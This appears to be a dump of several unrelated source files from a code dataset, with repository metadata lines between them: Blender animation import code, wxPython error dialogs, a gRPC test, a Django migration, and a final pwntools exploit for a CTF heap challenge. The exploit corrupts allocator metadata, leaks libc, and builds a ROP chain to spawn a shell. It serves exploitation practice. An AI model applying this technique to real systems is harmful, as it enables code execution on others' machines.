ydL = ydL.to_translation()
ydR = ydR.to_translation()
# yd = get_dynamic_mtx(p_bone, frame+EPSILON).position()
dL = (ydL-y)/EPSILON
dR = (ydR-y)/EPSILON
return y, dL, dR
def get_rot_vct(p_bone, frame):
EPSILON = 1E-4
y, ydL, ydR = get_dynamic_mtx(p_bone, frame)
y = y.to_euler('XYZ')
ydL = ydL.to_euler('XYZ')
ydR = ydR.to_euler('XYZ')
# yd = get_dynamic_mtx(p_bone, frame+EPSILON).rotation()
dL = product(1/EPSILON, subtract2(ydL, y))
dR = product(1/EPSILON, subtract2(ydR, y))
return y, dL, dR
def get_sc_vct(p_bone, frame):
y, dL, dR = p_bone.frames.get_sc(frame)
y.x /= p_bone.jnt_frame.sx
y.y /= p_bone.jnt_frame.sy
y.z /= p_bone.jnt_frame.sz
dL.x /= p_bone.jnt_frame.sx
dL.y /= p_bone.jnt_frame.sy
dL.z /= p_bone.jnt_frame.sz
dR.x /= p_bone.jnt_frame.sx
dR.y /= p_bone.jnt_frame.sy
dR.z /= p_bone.jnt_frame.sz
return y, dL, dR
instances = {}
class KeyFrames:
def __init__(self):
self.times = {}
self.positions = [{}, {}, {}]
self.rotations = [{}, {}, {}]
self.scales = [{}, {}, {}]
def feed_anim(self, anim, include_sc=True, fr_sc=1, fr_of=0):
for key in anim.translationsX:
self.positions[0][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[0] = True
for key in anim.translationsY:
self.positions[1][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[0] = True
for key in anim.translationsZ:
self.positions[2][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[0] = True
for key in anim.rotationsX:
self.rotations[0][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[1] = True
for key in anim.rotationsY:
self.rotations[1][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[1] = True
for key in anim.rotationsZ:
self.rotations[2][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[1] = True
if include_sc:
for key in anim.scalesX:
self.scales[0][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[2] = True
for key in anim.scalesY:
self.scales[1][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[2] = True
for key in anim.scalesZ:
self.scales[2][fr_sc*key.time+fr_of] = (key.value, key.tangentL, key.tangentR)
dict_get_set(self.times, fr_sc*key.time+fr_of, [False, False, False])[2] = True
        # add a last key frame on every channel (to avoid crashes), but do not register it as 'real'
anim_length = max(self.times.keys())
for coordinate in (0,1,2):
max_time = max(self.positions[coordinate].keys())
if max_time < anim_length:
self.positions[coordinate][anim_length] = self.positions[coordinate][max_time]
max_time = max(self.rotations[coordinate].keys())
if max_time < anim_length:
self.rotations[coordinate][anim_length] = self.rotations[coordinate][max_time]
max_time = max(self.scales[coordinate].keys())
if max_time < anim_length:
self.scales[coordinate][anim_length] = self.scales[coordinate][max_time]
def _get_vt(self, data, time):
if time in data.keys():
return data[time]
elif len(data.keys()) == 1:
return next(iter(data.values()))
prev_t = -math.inf
next_t = +math.inf
for frame_t in data.keys():
if prev_t < frame_t < time:
prev_t = frame_t
elif time < frame_t < next_t:
next_t = frame_t
return cubic_interpolator(prev_t, data[prev_t][0], data[prev_t][2],
next_t, data[next_t][0], data[next_t][1], time)
def get_pos(self, time):
temp_x = self._get_vt(self.positions[0], time)
temp_y = self._get_vt(self.positions[1], time)
temp_z = self._get_vt(self.positions[2], time)
return (Vector((temp_x[0], temp_y[0], temp_z[0])),
Vector((temp_x[1], temp_y[1], temp_z[1])),
Vector((temp_x[2], temp_y[2], temp_z[2])))
def get_rot(self, time):
temp_x = self._get_vt(self.rotations[0], time)
temp_y = self._get_vt(self.rotations[1], time)
temp_z = self._get_vt(self.rotations[2], time)
return (Euler((temp_x[0], temp_y[0], temp_z[0]), 'XYZ'),
Euler((temp_x[1], temp_y[1], temp_z[1]), 'XYZ'),
Euler((temp_x[2], temp_y[2], temp_z[2]), 'XYZ'))
def get_sc(self, time):
temp_x = self._get_vt(self.scales[0], time)
temp_y = self._get_vt(self.scales[1], time)
temp_z = self._get_vt(self.scales[2], time)
return (Vector((temp_x[0], temp_y[0], temp_z[0])),
Vector((temp_x[1], temp_y[1], temp_z[1])),
Vector((temp_x[2], temp_y[2], temp_z[2])))
def get_mtx(self, time):
EPSILON = 1E-4
vct_y, vct_dL, vct_dR = self.get_pos(time)
rot_y, rot_dL, rot_dR = self.get_rot(time)
vct_ydL = sum2(vct_y, product(EPSILON, vct_dL))
rot_ydL = sum2(rot_y, product(EPSILON, rot_dL))
vct_ydR = sum2(vct_y, product(EPSILON, vct_dR))
rot_ydR = sum2(rot_y, product(EPSILON, rot_dR))
return ( (Matrix.Translation(vct_y) * rot_y.to_matrix().to_4x4()),
(Matrix.Translation(vct_ydL) * rot_ydL.to_matrix().to_4x4()),
(Matrix.Translation(vct_ydR) * rot_ydR.to_matrix().to_4x4()) )
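# Minimal usage sketch for KeyFrames (hypothetical data, not from the BMD
# loader): feed_anim() expects an object whose translationsX/.../scalesZ
# attributes are sequences of keys carrying .time, .value, .tangentL and
# .tangentR, as read above.
#
#     kf = KeyFrames()
#     kf.feed_anim(one_joint_bck_track)          # hypothetical BCK track
#     pos, d_left, d_right = kf.get_pos(12.0)    # interpolated Vector + slopes
#     mtx, mtx_dL, mtx_dR = kf.get_mtx(12.0)     # translation*rotation matrices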
class Pseudobone:
def __init__(self, parentBone, frame, matrix, startpoint, endpoint):
self._name = None
ori = endpoint - startpoint
self.endpoint = endpoint
self.length = math.sqrt(ori.x**2 + ori.y**2 + ori.z**2)
self.orientation = vect_normalize(ori)
self.scale = Vector((1, 1, 1))
self.jnt_frame = None
# self.rotation_euler = Euler((0, 0, 0), 'XYZ')
self.position = startpoint
self.frames = KeyFrames()
# self.inverted_static_mtx = None
self.computed_d_matrices = {}
self.computed_t_matrices = {}
# self.scale_kf = {} # keyframes (values)
# self.scale_tkf = {} # keyframes (tangents)
# self.rotation_kf = {}
# self.rotation_tkf = {}
# self.position_kf = {}
# self.position_tkf = {}
# self.transform = mathutils.Matrix.Identity(4) # what to do with that? it will be ultimately useless.
self._parent = None
self.children = []
# property business --------------------------------
def _getname():
return self._name
def _setname(val):
global instances
if self._name is not None:
del instances[self._name]
            if val is not None and val in instances.keys():
raise ValueError('name taken')
self._name = val
instances[val] = self
def _delname():
self.name = None
self.name = property(_getname, _setname, _delname)
def _getparent():
return self._parent
def _setparent(val):
if isinstance(self.parent.fget(), Pseudobone) and (self in self.parent.fget().children):
self.parent.fget().children.remove(self)
self._parent = val
if val is None or isinstance(val, Vector):
return
val.children.append(self)
self.parent = property(_getparent, _setparent)
def _setinchildren(holder, val):
list.append(holder.children, val)
val._parent = holder
# self.children_append = (lambda self2, x: _setinchildren(self, x))
if isinstance(frame, str):
self.name.fset(frame)
else:
self.jnt_frame = frame
self.name.fset(frame.name)
self.parent.fset(parentBone)
self.matrix = matrix
# defines self.name, self.parent, self.children_append.
def pre_delete(self):
# call before losing variable to avoid memory leak
self.parent.fset(None)
for com in self.children:
com.pre_delete()
def _tree_to_array(self, dest):
"""inner function. do not call."""
dest.append(self)
for com in self.children:
com._tree_to_array(dest)
def tree_to_array(self):
"""returns a list of all bones"""
ret = []
self._tree_to_array(ret)
return ret
def reset(self):
self.frames = KeyFrames()
self.computed_d_matrices = {}
self.computed_t_matrices = {}
def get_z(self):
if common.GLOBALS.no_rot_conversion:
return rotation_part(self.matrix) * Vector((0,0,1))
else:
return NtoB*rotation_part(self.matrix)*BtoN * Vector((0,0,1))
def getBoneByName(name):
global instances
try:
return instances[name]
except KeyError:
return None
def getvct(one, distance, tgt):
"""get the right keyframe handle vector""" # XCX use me!
# method one:
return Vector((one, one*tgt))
finder = re.compile(r'''pose\.bones\[['"](\w*)['"]\]\.(\w*)''')
#used to determine what curves belong to what bones
def apply_animation(bones, arm_obj, jntframes, name=None):
"""apply keyframes from pseudobones to real, armature bones"""
if name:
arm_obj.animation_data.action = bpy.data.actions.new(name + '_action')
else:
arm_obj.animation_data.action = bpy.data.actions.new(arm_obj.name+'_action')
bpy.context.scene.frame_current = 0
# warning: here, the `name` var changes meaning
for com in bones:
name = com.name.fget()
arm_obj.data.bones[name].use_inherit_scale = False # scale can be applied
posebone = arm_obj.pose.bones[name]
if common.GLOBALS.no_rot_conversion:
posebone.rotation_mode = "XYZ"
else:
posebone.rotation_mode = "XZY" # remember, coords are flipped
bpy.context.scene.frame_current = 0
# this keyframe is needed, overwritten anyways
# also it is always at 1 because this function is called once per action
posebone.keyframe_insert('location')
posebone.keyframe_insert('rotation_euler')
posebone.keyframe_insert('scale')
fcurves = arm_obj.animation_data.action.fcurves
data = {}
for curve in fcurves:
# create data in dicts ({bonename:{datatype:[0,1,2]...}...})
try:
bonename, datatype = finder.match(curve.data_path).groups()
        except TypeError: # cannot unpack None: this fcurve is not interesting
continue
bonedict = common.dict_get_set(data, bonename, {})
datadict = common.dict_get_set(bonedict, datatype, [None, None, None])
datadict[curve.array_index] = curve
    # create keyframes, with tangents
for com in bones:
name = com.name.fget()
bonedict = data[name]
posebone = arm_obj.pose.bones[name]
bpy.context.scene.frame_current = 0
posebone.keyframe_insert('location')
posebone.keyframe_insert('rotation_euler')
posebone.keyframe_insert('scale')
every_frame = list(com.frames.times.keys())
every_frame.sort()
refpos = com.jnt_frame
if type(com.parent.fget()) is not Pseudobone:
com.rotmatrix = Matrix.Identity(4)
com.parentrot = Matrix.Identity(4)
else:
com.rotmatrix = com.parent.fget().rotmatrix
com.parentrot = com.parent.fget().rotmatrix
tempmat = Euler((refpos.rx, refpos.ry, refpos.rz), 'XYZ').to_matrix().to_4x4()
com.rotmatrix *= tempmat
cancel_ref_rot = tempmat.inverted()
for frame in every_frame:
bpy.context.scene.frame_current = frame
# flip y and z when asked for
if com.frames.times[frame][0]:
vct, tgL, tgR = get_pos_vct(com, frame)
if not common.GLOBALS.no_rot_conversion:
tgL.z, tgL.y = tgL.y, -tgL.z
tgR.z, tgR.y = tgR.y, -tgR.z
vct.z, vct.y = vct.y, -vct.z
if not math.isnan(vct.x):
posebone.location[0] = vct.x
co = bonedict['location'][0].keyframe_points[-1].co
bonedict['location'][0].keyframe_points[-1].handle_left = co+Vector((-1, -tgL.x))
bonedict['location'][0].keyframe_points[-1].handle_right = co+Vector((1, tgR.x))
posebone.keyframe_insert('location', 0)
                    # fixed: add frame to keyframes AFTER setting the right value to it. so counter-intuitive.
if not math.isnan(vct.y):
posebone.location[1] = vct.y
co = bonedict['location'][1].keyframe_points[-1].co
bonedict['location'][1].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.y))
bonedict['location'][1].keyframe_points[-1].handle_right = co + Vector((1, tgR.y))
posebone.keyframe_insert('location', 1)
if not math.isnan(vct.z):
posebone.location[2] = vct.z
co = bonedict['location'][2].keyframe_points[-1].co
bonedict['location'][2].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.z))
bonedict['location'][2].keyframe_points[-1].handle_right = co + Vector((1, tgR.z))
posebone.keyframe_insert('location', 2)
if com.frames.times[frame][1]:
vct, tgL, tgR = get_rot_vct(com, frame)
if not common.GLOBALS.no_rot_conversion:
tgL.z, tgL.y = tgL.y, -tgL.z
tgR.z, tgR.y = tgR.y, -tgR.z
vct.z, vct.y = vct.y, -vct.z
if not math.isnan(vct.x):
posebone.rotation_euler[0] = vct.x
co = bonedict['rotation_euler'][0].keyframe_points[-1].co
bonedict['rotation_euler'][0].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.x))
bonedict['rotation_euler'][0].keyframe_points[-1].handle_right = co + Vector((1, tgR.x))
posebone.keyframe_insert('rotation_euler', 0)
if not math.isnan(vct.y):
posebone.rotation_euler[1] = vct.y
co = bonedict['rotation_euler'][1].keyframe_points[-1].co
bonedict['rotation_euler'][1].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.y))
bonedict['rotation_euler'][1].keyframe_points[-1].handle_right = co + Vector((1, tgR.y))
posebone.keyframe_insert('rotation_euler', 1)
if not math.isnan(vct.z):
posebone.rotation_euler[2] = vct.z
co = bonedict['rotation_euler'][2].keyframe_points[-1].co
bonedict['rotation_euler'][2].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.z))
bonedict['rotation_euler'][2].keyframe_points[-1].handle_right = co + Vector((1, tgR.z))
posebone.keyframe_insert('rotation_euler', 2)
if com.frames.times[frame][2]:
vct, tgL, tgR = get_sc_vct(com, frame)
if not common.GLOBALS.no_rot_conversion:
tgL.z, tgL.y = tgL.y, tgL.z
tgR.z, tgR.y = tgR.y, tgR.z
vct.z, vct.y = vct.y, vct.z
if not math.isnan(vct.x):
posebone.scale[0] = vct.x
co = bonedict['scale'][0].keyframe_points[-1].co
bonedict['scale'][0].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.x))
bonedict['scale'][0].keyframe_points[-1].handle_right = co + Vector((1, tgR.x))
posebone.keyframe_insert('scale', 0)
if not math.isnan(vct.y):
posebone.scale[1] = vct.y
co = bonedict['scale'][1].keyframe_points[-1].co
bonedict['scale'][1].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.y))
bonedict['scale'][1].keyframe_points[-1].handle_right = co + Vector((1, tgR.y))
posebone.keyframe_insert('scale', 1)
if not math.isnan(vct.z):
posebone.scale[2] = vct.z
co = bonedict['scale'][2].keyframe_points[-1].co
bonedict['scale'][2].keyframe_points[-1].handle_left = co + Vector((-1, -tgL.z))
bonedict['scale'][2].keyframe_points[-1].handle_right = co + Vector((1, tgR.z))
posebone.keyframe_insert('scale', 2)
return arm_obj.animation_data.action
| gpl-3.0 | 5,015,250,740,609,675,000 | 39.481262 | 111 | 0.53735 | false |
CFIS-Octarine/octarine | validate/gui/views/errorhandling.py | 1 | 5325 | __author__ = "David Rusk <[email protected]>"
import wx
class CertificateDialog(wx.Dialog):
def __init__(self, parent, handler, error_message):
super(CertificateDialog, self).__init__(parent, title="Certificate Error")
self.handler = handler
self.error_message = error_message
self._init_ui()
self._do_layout()
def _init_ui(self):
        self.header_text = wx.StaticText(self, label="An error has occurred "
"which likely indicates "
"your CADC certificate "
"is invalid:")
self.error_text = wx.StaticText(self, label=self.error_message)
error_font = wx.Font(12, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_ITALIC,
wx.FONTWEIGHT_NORMAL)
self.error_text.SetFont(error_font)
self.prompt_text = wx.StaticText(self, label="Enter your CADC "
"credentials to get a "
"new certificate:")
self.username_label = wx.StaticText(self, label="CADC Username: ")
self.username_field = wx.TextCtrl(self)
self.password_label = wx.StaticText(self, label="Password: ")
self.password_field = wx.TextCtrl(self, style=wx.TE_PASSWORD)
self.accept_button = wx.Button(self, label="Get certificate")
self.cancel_button = wx.Button(self, label="Cancel")
self.accept_button.Bind(wx.EVT_BUTTON, self.on_accept)
self.cancel_button.Bind(wx.EVT_BUTTON, self.on_cancel)
self.username_field.SetFocus()
self.accept_button.SetDefault()
def _do_layout(self):
vsizer = wx.BoxSizer(wx.VERTICAL)
flag = wx.ALIGN_CENTER | wx.ALL
border = 10
vsizer.Add(self.header_text, flag=flag, border=border)
vsizer.Add(self.error_text, flag=flag, border=border)
line = wx.StaticLine(self, -1, size=(20, -1), style=wx.LI_HORIZONTAL)
vsizer.Add(line, flag=wx.GROW | wx.ALIGN_CENTER_VERTICAL | wx.RIGHT | wx.TOP, border=5)
vsizer.Add(self.prompt_text, flag=flag, border=border)
input_sizer = wx.FlexGridSizer(cols=2, hgap=5, vgap=border)
input_sizer.Add(self.username_label)
input_sizer.Add(self.username_field, proportion=1, flag=wx.EXPAND)
input_sizer.Add(self.password_label, wx.EXPAND)
input_sizer.Add(self.password_field, proportion=1, flag=wx.EXPAND)
input_sizer.AddGrowableCol(1, proportion=1)
vsizer.Add(input_sizer, flag=wx.EXPAND)
button_sizer = wx.BoxSizer(wx.HORIZONTAL)
button_sizer.Add(self.accept_button, flag=wx.RIGHT, border=5)
button_sizer.Add(self.cancel_button, flag=wx.LEFT, border=5)
vsizer.Add(button_sizer, flag=flag, border=border)
padding_sizer = wx.BoxSizer(wx.HORIZONTAL)
padding_sizer.Add(vsizer, flag=wx.ALL, border=20)
self.SetSizerAndFit(padding_sizer)
def on_cancel(self, event):
self.Close()
def on_accept(self, event):
username = self.username_field.GetValue()
password = self.password_field.GetValue()
self.handler.refresh_certificate(username, password)
self.Close()
class RetryDownloadDialog(wx.Dialog):
def __init__(self, parent, handler, error_message):
super(RetryDownloadDialog, self).__init__(parent, title="Download Error")
self.handler = handler
self.error_message = error_message
self._init_ui()
self._do_layout()
def _init_ui(self):
self.header_text = wx.StaticText(self, label="One or more downloads "
"failed:")
self.error_text = wx.StaticText(self, label=self.error_message)
error_font = wx.Font(12, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_ITALIC,
wx.FONTWEIGHT_NORMAL)
self.error_text.SetFont(error_font)
self.retry_button = wx.Button(self, label="Retry")
self.cancel_button = wx.Button(self, label="Cancel")
self.retry_button.Bind(wx.EVT_BUTTON, self.on_accept)
self.cancel_button.Bind(wx.EVT_BUTTON, self.on_cancel)
self.retry_button.SetDefault()
def _do_layout(self):
vsizer = wx.BoxSizer(wx.VERTICAL)
flag = wx.ALIGN_CENTER | wx.ALL
border = 10
vsizer.Add(self.header_text, flag=flag, border=border)
vsizer.Add(self.error_text, flag=flag, border=border)
line = wx.StaticLine(self, -1, size=(20, -1), style=wx.LI_HORIZONTAL)
vsizer.Add(line, flag=wx.GROW | wx.ALIGN_CENTER_VERTICAL | wx.RIGHT | wx.TOP, border=5)
button_sizer = wx.BoxSizer(wx.HORIZONTAL)
button_sizer.Add(self.retry_button, flag=wx.RIGHT, border=5)
button_sizer.Add(self.cancel_button, flag=wx.LEFT, border=5)
vsizer.Add(button_sizer, flag=flag, border=border)
padding_sizer = wx.BoxSizer(wx.HORIZONTAL)
padding_sizer.Add(vsizer, flag=wx.ALL, border=20)
self.SetSizerAndFit(padding_sizer)
def on_cancel(self, event):
self.Close()
def on_accept(self, event):
self.handler.retry_downloads()
self.Close() | gpl-3.0 | -8,906,130,566,601,220,000 | 36.244755 | 95 | 0.604131 | false |
firebase/grpc-SwiftPM | src/python/grpcio_tests/tests_aio/unit/init_test.py | 1 | 1698 | # Copyright 2019 The gRPC Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import unittest
import grpc
from grpc.experimental import aio
from tests_aio.unit._test_server import start_test_server
from tests_aio.unit._test_base import AioTestBase
class TestInsecureChannel(AioTestBase):
async def test_insecure_channel(self):
server_target, _ = await start_test_server() # pylint: disable=unused-variable
channel = aio.insecure_channel(server_target)
self.assertIsInstance(channel, aio.Channel)
class TestSecureChannel(AioTestBase):
"""Test a secure channel connected to a secure server"""
def test_secure_channel(self):
async def coro():
server_target, _ = await start_test_server(secure=True) # pylint: disable=unused-variable
credentials = grpc.local_channel_credentials(
grpc.LocalConnectionType.LOCAL_TCP)
secure_channel = aio.secure_channel(server_target, credentials)
self.assertIsInstance(secure_channel, aio.Channel)
self.loop.run_until_complete(coro())
if __name__ == '__main__':
logging.basicConfig()
unittest.main(verbosity=2)
| apache-2.0 | -660,082,624,246,504,200 | 32.294118 | 102 | 0.717314 | false |
aggrent/cab | cab/migrations/0002_migrate_ratings.py | 1 | 7081 | # encoding: utf-8
from south.v2 import DataMigration
from django.contrib.contenttypes.models import ContentType
from django.db.models import signals
from ratings.models import RatedItem, SimilarItem
class Migration(DataMigration):
def forwards(self, orm):
signals.post_save.disconnect(sender=RatedItem, dispatch_uid='update_rating_score')
try:
ctype = ContentType.objects.get(app_label='cab', model='snippet')
except ContentType.DoesNotExist:
# If the content type doesn't even exist yet, this is probably a fresh installation
return
for rating in orm['cab.rating'].objects.all():
RatedItem.objects.create(
user_id=rating.user.pk,
object_id=rating.snippet.pk,
content_type=ctype,
score=rating.score)
def backwards(self, orm):
RatedItem.objects.all().delete()
SimilarItem.objects.all().delete()
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'cab.bookmark': {
'Meta': {'object_name': 'Bookmark'},
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'snippet': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'bookmarks'", 'to': "orm['cab.Snippet']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'cab_bookmarks'", 'to': "orm['auth.User']"})
},
'cab.language': {
'Meta': {'object_name': 'Language'},
'file_extension': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language_code': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'mime_type': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'})
},
'cab.rating': {
'Meta': {'object_name': 'Rating'},
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'score': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'snippet': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'ratings'", 'to': "orm['cab.Snippet']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'cab_ratings'", 'to': "orm['auth.User']"})
},
'cab.snippet': {
'Meta': {'object_name': 'Snippet'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'bookmark_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'code': ('django.db.models.fields.TextField', [], {}),
'description': ('django.db.models.fields.TextField', [], {}),
'description_html': ('django.db.models.fields.TextField', [], {}),
'highlighted_code': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cab.Language']"}),
'pub_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'rating_score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['cab']
| bsd-3-clause | -4,519,894,992,598,839,300 | 63.963303 | 163 | 0.551758 | false |
integeruser/on-pwning | 2017-csaw-quals/Zone/zone.py | 1 | 3639 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *
context(arch='amd64', os='linux', aslr=True, terminal=['tmux', 'neww'])
if args['GDB']:
elf, libc = ELF('./zone-amd64-2.23-0ubuntu9'), ELF('libs/amd64/2.23/0ubuntu9/libc-2.23.so')
io = gdb.debug('./zone-amd64-2.23-0ubuntu9', gdbscript='''\
c
''')
elif args['REMOTE']:
elf, libc = ELF('./zone'), ELF('libs/amd64/2.23/0ubuntu9/libc-2.23.so')
io = remote('pwn.chal.csaw.io', 5223)
else:
elf, libc = ELF('./zone-amd64-2.23-0ubuntu9'), ELF('libs/amd64/2.23/0ubuntu9/libc-2.23.so')
io = process(['stdbuf', '-i0', '-o0', '-e0', './zone-amd64-2.23-0ubuntu9'])
def allocate(size):
io.recvuntil('5) Exit\n')
io.sendline('1')
io.sendline(str(size))
def delete_last():
io.recvuntil('5) Exit\n')
io.sendline('2')
io.recvuntil('Free')
def write_last(data, newline=True):
io.recvuntil('5) Exit\n')
io.sendline('3')
io.sendline(data) if newline else io.send(data)
def print_last():
io.recvuntil('5) Exit\n')
io.sendline('4')
return io.recvline()
io.recvuntil('Environment setup: ')
stack_leak_address = int(io.recvline(), 16)
success('stack leak address: %s' % hex(stack_leak_address))
# a chunk is of the form
# {size|ptr to the next free chunk of same size|data}
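# rough sketch of the layout this relies on (field widths assumed from the
# comment above, purely illustrative):
#
#   chunk A: [ size | next_free | data[0x40] ]
#   chunk B: [ size | next_free | data[0x40] ]   <- starts right after A's data
#
# so writing 0x40 bytes plus one extra byte into A clobbers the first byte of
# B's size field, turning its 0x40 into 0x80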
# allocate a 0x40 byte block
allocate(0x40)
# overflow the 65th byte of the block to be 0x80, so as to modify the size of the next free block
write_last('A' * 0x40 + chr(0x80), newline=False)
# allocate another 0x40 byte block (the one with the size modified)
allocate(0x40)
# free this last block (which will be put at the top of the list of free chunks of size 0x80)
delete_last()
# allocate a chunk of size 0x80 to get this chunk
allocate(0x80)
# we can now write 0x80 characters into a chunk which is in the list of chunks of size 0x40
# so we can overflow into the next 0x40 chunk and mess with its pointer to the next free chunk
write_last(fit({cyclic_find('jaaaaaaa', n=8): p64(stack_leak_address + 0x80 - 0x8)}))
# allocate two more 0x40 chunks
# the second chunk will be in the stack (since, in the first chunk, we changed the pointer to the next free)
allocate(0x40)
allocate(0x40)
# print the content of the chunk to leak an address from libc
libc_leak_address = u64(print_last()[:6].ljust(8, '\x00'))
success('libc leak address: %s' % hex(libc_leak_address))
libc.address = libc_leak_address - (libc.symbols['__libc_start_main'] + 240)
success('libc address: %s' % hex(libc.address))
rop = ROP(libc)
rop.system(next(libc.search('/bin/sh')))
print rop.dump()
# write in the chunk to change the return address
write_last(bytes(rop))
# exit to return to execute the rop chain
io.recvuntil('5) Exit\n')
io.sendline('5')
io.interactive()
# $ ./zone.py REMOTE
# [+] Opening connection to pwn.chal.csaw.io on port 5223: Done
# [*] '/home/ubuntu/vbox/zone'
# Arch: amd64-64-little
# RELRO: Partial RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: No PIE (0x400000)
# [*] '/home/ubuntu/vbox/libc-amd64-2.23-0ubuntu9.so'
# Arch: amd64-64-little
# RELRO: Partial RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: PIE enabled
# [+] stack leak address: 0x7ffd63409140
# [+] libc leak address: 0x7efc0b64a830
# [+] libc address: 0x7efc0b62a000
# [*] Loaded cached gadgets for './libc-amd64-2.23-0ubuntu9.so'
# 0x0000: 0x7efc0b64b102 pop rdi; ret
# 0x0008: 0x7efc0b7b6d17
# 0x0010: 0x7efc0b66f390 system
# 0x0018: 'gaaahaaa' <pad>
# [*] Switching to interactive mode
# $ ls
# flag
# zone
# $ cat flag
# flag{d0n7_let_m3_g3t_1n_my_z0n3}
| mit | 7,253,582,822,140,688,000 | 30.921053 | 108 | 0.663094 | false |
